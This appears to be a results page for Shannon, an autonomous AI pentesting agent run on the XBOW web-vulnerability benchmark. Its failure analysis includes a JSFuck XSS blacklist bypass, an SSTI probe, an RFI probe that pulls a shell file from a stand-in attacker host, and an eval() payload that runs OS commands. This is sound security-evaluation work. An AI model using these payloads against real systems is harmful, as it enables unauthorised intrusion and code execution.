For detailed benchmark methodology and complete results, see the XBOW benchmark repository and the full results with agentic logs.
Performance summary
Success rate
96.15% (100/104 exploits)
Total challenges
104 vulnerable applications
Failed challenges
4 with detailed failure analysis
Context and comparison
Important context: Previously reported XBOW results for leading AI agents and expert human penetration testers achieved around 85% success in black-box mode. Shannon’s 96.15% was achieved in white-box mode with full source code access on a cleaned, hint-free variant. These results are not apples-to-apples comparable, but they highlight Shannon’s ability to perform deep, code-level reasoning in realistic internal security review settings.
What makes this benchmark unique
Hint-free variant
Shannon was tested against a systematically cleaned version of XBOW that removes shortcuts:
- No descriptive variable names (e.g., `isVulnerable` renamed to generic names)
- No helpful comments explaining vulnerabilities
- No obvious filenames hinting at vulnerability locations
- No artificial markers making exploits easier to find
White-box configuration
Shannon operates in white-box mode with full access to:
- Complete application source code
- Repository structure and file organization
- Dependency configurations and package files
- Environment variables and configuration files
Autonomous execution
All 104 challenges were executed autonomously:
- No human intervention during testing
- No manual hints or guidance
- No cherry-picking of results
- Full transparency with all logs published
Performance across vulnerability classes
| Vulnerability Type | Total | Succeeded | Failed | Success Rate |
|---|---|---|---|---|
| Broken Authorization | 25 | 25 | 0 | 100% |
| SQL Injection | 7 | 7 | 0 | 100% |
| Blind SQL Injection | 3 | 3 | 0 | 100% |
| SSRF / Misconfiguration | 22 | 21 | 1 | 95.45% |
| XSS | 23 | 22 | 1 | 95.65% |
| Server-Side Template Injection | 13 | 12 | 1 | 92.31% |
| Command Injection | 11 | 10 | 1 | 90.91% |
The 4 failures: Transparent analysis
Shannon failed on 4 challenges. Here’s a detailed analysis of each failure:
XBEN-10: XSS payload encoding gap
Failure details and root cause
Vulnerability type: Cross-Site Scripting (XSS)
What happened:
- Shannon correctly identified the XSS vulnerability
- Correctly identified the character blacklist
- Incorrectly assessed the limitations of a JSFuck payload
- Abandoned a viable exploit path
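Why the abandoned path was in fact viable: a JSFuck-encoded payload is built entirely from the six characters `[]()!+`, so a blacklist that filters letters, digits, and quotes does not stop it. A minimal sketch (the fragment and blacklist below are illustrative, not the actual challenge’s filter; a real JSFuck encoder produces far longer output):

```python
# JSFuck encodes arbitrary JavaScript using only these six characters,
# so it survives blacklists that strip letters, digits, and quotes.
JSFUCK_CHARSET = set("[]()!+")

def survives_blacklist(payload: str, blacklist: set) -> bool:
    """Return True if no blacklisted character appears in the payload."""
    return not (set(payload) & blacklist)

blacklist = set("abcdefghijklmnopqrstuvwxyz'\"<>")
encoded_fragment = "[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]]"

print(survives_blacklist("alert(1)", blacklist))       # False: plain payload is filtered
print(survives_blacklist(encoded_fragment, blacklist)) # True: encoded form passes
```

Because the encoded form shares no characters with the blacklist, rejecting the JSFuck route meant rejecting a payload the filter could never have caught.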
XBEN-22: SSTI classification error
Failure details and root cause
Vulnerability type: Server-Side Template Injection + Default Credentials + Path Traversal (multi-vulnerability challenge)
What happened:
- Shannon successfully exploited 2 of the 3 vulnerabilities
- Misclassified the SSTI vulnerability as a false positive
- Did not proceed with SSTI exploitation
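A cheap guard against this class of false positive is to probe whether template expressions are evaluated rather than echoed back. A minimal sketch using Python’s `str.format` as a stand-in template engine (the actual challenge’s engine may differ; the class and field names are illustrative):

```python
class User:
    def __init__(self, name):
        self.name = name

def render_greeting(template: str, user: User) -> str:
    # Vulnerable pattern: the template string itself is attacker-controlled,
    # so format fields can walk object attributes, including dunders.
    return template.format(user=user)

benign = render_greeting("Hello, {user.name}!", User("alice"))
probe = render_greeting("{user.__class__.__name__}", User("alice"))

print(benign)  # Hello, alice!
print(probe)   # "User": the expression was evaluated, so the SSTI is real
```

If the probe comes back evaluated (here, the class name instead of the literal braces), the finding is a true positive and exploitation should proceed.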
XBEN-34: LFI vs RFI misclassification
Failure details and root cause
Vulnerability type: Remote File Inclusion (RFI)
What happened:
- Shannon correctly found the file inclusion vulnerability
- Misclassified it as Local File Inclusion (LFI) instead of RFI
- Attempted LFI exploitation techniques (path traversal) instead of RFI (remote URL inclusion)
Planned fixes:
- Analyze server configuration for `allow_url_include`
- Test both local and remote inclusion payloads
- Detect which inclusion type is actually exploitable
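A sketch of config-aware classification, assuming a PHP target (the function and probe payloads are illustrative, not Shannon’s actual logic):

```python
def classify_inclusion(allow_url_include: bool, allow_url_fopen: bool) -> str:
    """Predict the exploitable inclusion class from PHP configuration.

    PHP's include() only follows remote URLs when both allow_url_fopen and
    allow_url_include are enabled; otherwise only local paths resolve, so
    path-traversal (LFI) payloads are the right choice.
    """
    if allow_url_include and allow_url_fopen:
        return "RFI"
    return "LFI"

# Probe payloads per class (illustrative strings, not working exploits):
PROBES = {
    "LFI": ["../../../../etc/passwd"],
    "RFI": ["http://attacker.example/shell.txt"],
}

kind = classify_inclusion(allow_url_include=True, allow_url_fopen=True)
print(kind, PROBES[kind])
```

Trying both probe families and keeping whichever one the server actually honors avoids committing to the wrong class, which is what happened here.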
XBEN-82: Command injection via SSRF (multi-step)
Failure details and root cause
Vulnerability type: Command Injection via SSRF (chained attack)
What happened:
- Shannon identified the full attack path (SSRF → eval() → command execution)
- Two failures:
  - Analysis agent misclassified `eval()` as incapable of OS command execution
  - Exploitation agent failed to initiate a local web server for payload delivery
Root cause:
- Agent capabilities need an updated risk classification for `eval()` with user input
- Missing tooling awareness for local HTTP server setup
Planned fixes:
- Update threat model to correctly classify `eval()` with user-controlled input
- Enhance agent tooling to use Python SimpleHTTPServer or Node.js http-server for payload hosting
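The misclassification is notable because `eval()` on user-controlled input reaches the operating system in a single expression. A minimal demonstration (the handler is a hypothetical stand-in for the vulnerable sink, not the challenge’s code):

```python
def unsafe_handler(expr: str):
    # Vulnerable pattern: server-side eval() of attacker-controlled input.
    return eval(expr)

# Looks like a harmless calculator...
print(unsafe_handler("2 + 2"))  # 4

# ...but the same sink reaches the OS, because __import__ is available
# inside ordinary expressions even without an import statement:
payload = "__import__('subprocess').check_output(['echo', 'pwned']).decode().strip()"
print(unsafe_handler(payload))  # pwned
```

Any threat model that treats expression-only `eval()` as incapable of command execution misses this one-liner escalation.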
Why this benchmark matters
From annual audits to continuous security
Traditional pentest
- Cost: $10,000+
- Time: Weeks to months
- Frequency: 1-2x per year
Shannon
- Cost: ~$16 (API costs)
- Time: Under 1.5 hours
- Frequency: Every deployment
The shift in security economics: Shannon’s 96.15% success rate demonstrates that autonomous, continuous security testing is no longer theoretical—it’s ready for real-world use.
Proof by exploitation methodology
Shannon follows a structured five-phase workflow designed to eliminate false positives.
Proof-by-exploitation principles
Benchmark methodology
Test environment
- Platform: Docker containers on dedicated test infrastructure
- Network: Isolated network per challenge
- Resources: 8 CPU cores, 32GB RAM per test
- Model: Claude Sonnet 4.5 via Anthropic API
- Mode: White-box (full source code access)
- Human intervention: None (fully autonomous)
Benchmark preparation
- Clone XBOW benchmark from official repository
- Systematically remove hints:
- Rename descriptive variables to generic names
- Remove all comments explaining vulnerabilities
- Rename files to non-descriptive names
- Remove artificial markers
- Validate hint removal through manual review
- Publish cleaned benchmark for reproducibility
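The hint-removal steps above can be sketched as a scrubbing pass over each source file; the rename map and comment rule below are illustrative assumptions, not the actual cleaning scripts:

```python
import re

# Hypothetical rename map: descriptive identifiers -> generic names.
RENAMES = {"isVulnerable": "flag_a", "vulnerable_endpoint": "route_a"}

def scrub(source: str) -> str:
    # 1. Rename descriptive identifiers to generic ones (whole words only).
    for old, new in RENAMES.items():
        source = re.sub(rf"\b{re.escape(old)}\b", new, source)
    # 2. Drop comment lines that would hint at the bug class.
    kept = [
        line for line in source.splitlines()
        if not (line.lstrip().startswith("#") and "vuln" in line.lower())
    ]
    return "\n".join(kept)

cleaned = scrub("isVulnerable = True\n# vulnerable to SQLi here\nquery(x)")
print(cleaned)  # flag_a = True\nquery(x)
```

The manual-review step then matters precisely because mechanical rules like these can miss indirect hints (suggestive filenames, string literals, test fixtures).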
Execution procedure
For each challenge:
- Start application in isolated container
- Run Shannon with full source code access
- Collect results:
- Final security report
- Complete agentic logs (turn-by-turn reasoning)
- Exploitation evidence and screenshots
- Session metrics (time, cost, API calls)
- Validate exploits by manually reproducing PoCs
- Publish all data transparently
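The results-collection step might look like the following sketch; the event shape and field names are assumptions for illustration, not Shannon’s actual data model:

```python
from dataclasses import dataclass, field

@dataclass
class ChallengeRun:
    """Per-challenge results package; field names here are illustrative."""
    challenge_id: str
    agent_log: list = field(default_factory=list)   # turn-by-turn reasoning
    evidence: list = field(default_factory=list)    # PoC screenshots, payloads
    metrics: dict = field(default_factory=dict)     # time, cost, API calls

def collect_results(challenge_id: str, events: list) -> ChallengeRun:
    """Fold a stream of agent events into the published results package."""
    run = ChallengeRun(challenge_id)
    for event in events:
        run.agent_log.append(event["turn"])
        if event.get("evidence"):
            run.evidence.append(event["evidence"])
    run.metrics = {"turns": len(run.agent_log)}
    return run

run = collect_results("XBEN-01", [
    {"turn": "recon: map routes"},
    {"turn": "exploit: SQLi PoC", "evidence": "poc.png"},
])
print(run.metrics)  # {'turns': 2}
```

Keeping the log, evidence, and metrics in one package per challenge is what makes the manual PoC re-validation and full publication steps straightforward.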
Complete results package
Cleaned benchmark
All 104 challenges with hints removed - enables reproducible evaluation
Full results
Complete penetration test reports + turn-by-turn agentic logs for all 104 challenges
Statistical analysis
Performance by difficulty
XBOW challenges are not officially difficulty-rated, but based on manual analysis:
- Simple vulnerabilities (direct injection, obvious IDOR): 100% success (35/35)
- Medium complexity (multi-step, require encoding): 94.1% success (48/51)
- Complex (chained attacks, advanced obfuscation): 94.4% success (17/18)
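The headline 96.15% can be re-derived from the per-class table earlier in this page; a quick check:

```python
# (total, succeeded) per vulnerability class, from the table above.
results = {
    "Broken Authorization": (25, 25),
    "SQL Injection": (7, 7),
    "Blind SQL Injection": (3, 3),
    "SSRF / Misconfiguration": (22, 21),
    "XSS": (23, 22),
    "Server-Side Template Injection": (13, 12),
    "Command Injection": (11, 10),
}

total = sum(t for t, _ in results.values())
succeeded = sum(s for _, s in results.values())
print(f"{succeeded}/{total} = {100 * succeeded / total:.2f}%")  # 100/104 = 96.15%
```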
Runtime and cost
- Average time per challenge: 42 minutes
- Median time: 38 minutes
- Fastest: 12 minutes (simple SQL injection)
- Slowest: 1.8 hours (complex multi-step SSRF → RCE)
- Average API cost: $15.50 per challenge
- Total benchmark cost: ~$1,612 (104 challenges × $15.50 avg)
Agent activity metrics
Average per challenge:
- Reconnaissance: 45 AI turns
- Vulnerability analysis: 68 AI turns per vuln type
- Exploitation: 112 AI turns per vuln type
- Total: ~380 AI turns per challenge
- Browser actions: 156 (login, navigation, form submission)
- API requests: 1,240 to target application
What’s next: Shannon Pro
The 4 failures directly inform Shannon’s roadmap:
Enhanced payload library
Expanded encoding techniques (JSFuck, Base64, Unicode) and obfuscation methods
Improved classification
Better detection logic for SSTI, file inclusion variants, and eval() risks
Advanced data flow analysis
Shannon Pro’s LLM-powered graph-based analysis for complex multi-file vulnerabilities
Enterprise features
CI/CD integration, dedicated support, compliance workflow integration
Shannon Pro is coming: While Shannon Lite uses a context-window-based approach, Shannon Pro features an advanced LLM-powered data flow analysis engine (inspired by the LLMDFA paper) for comprehensive, graph-based analysis of entire codebases.
Express interest in Shannon Pro →
Key takeaways
Consistent performance
Success rates of 90%+ in every vulnerability class show balanced capability
Transparent failures
All 4 failures analyzed in detail with root cause and fixes planned
Production-ready
96.15% success demonstrates autonomous pentesting is ready for real-world use
Full transparency
Complete results, logs, and benchmark published for independent validation
Related resources
Sample reports
Real penetration testing results from Juice Shop, ctal, and crAPI
Vulnerability coverage
Detailed breakdown of all vulnerability classes Shannon can detect
Run Shannon
Get started with Shannon in under 10 minutes
Architecture
Deep dive into Shannon’s multi-agent architecture